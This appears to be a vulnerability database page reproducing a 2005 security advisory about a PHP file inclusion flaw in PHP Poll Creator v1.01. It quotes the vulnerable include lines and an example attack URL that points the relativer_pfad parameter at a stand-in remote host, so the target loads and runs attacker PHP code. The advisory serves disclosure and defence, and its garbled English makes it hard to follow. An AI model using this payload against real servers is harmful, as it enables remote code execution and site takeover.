Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

phpPoll.txt

🗓️ 14 Aug 2005 00:00:00Reported by rashType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 20 Views

PHP Poll Creator v 1.01 has PHP injection vulnerability in poll_vote.ph

Code
`  
  
svadvisory#6  
-------------------------------------------------------------+  
Title: PHP Injection in PHP Poll Creator |  
Software: PHP Poll Creator v 1.01 |  
Homepage: http://www.phppc.de +------------+  
Finder: rash | 24.05.05 |  
-------------------------------------------------------------+  
  
Description  
-------------------------------------------------------------|  
  
Vulnerability has been found in file poll_vote.php  
  
<?php  
include $relativer_pfad . "config.inc.php";  
include ($relativer_pfad . "lib/functions.inc.php");  
....  
?>  
  
one can implement any php code, what we need are it, a delivery  
the variable $relativer_pfad over URL, with which defintion our  
address to our file with php the code this file must absolutely  
config.inc.php is designated, otherwise cannot it not function  
where one this file put down are it no matter, main thing one  
give the exact address to the file config.inc.php with php the  
code to where them are.  
  
Example  
-------------------------------------------------------------|  
  
poll_vote.php?relativer_pfad=http://domain.tld/dir/  
  
  
Conclusion  
-------------------------------------------------------------|  
  
as I understood it, this is not any longer developed further  
script program, but I go of it out of that, all versions am  
concerned, but without guarantee.  
  
#############################################################  
  
rash || Search Vulnerabilities Team || www.svt.nukleon.us  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 Aug 2005 00:00Current
7.4High risk
Vulners AI Score7.4
php poll creatorvulnerabilityinjectionpoll_vote.php
20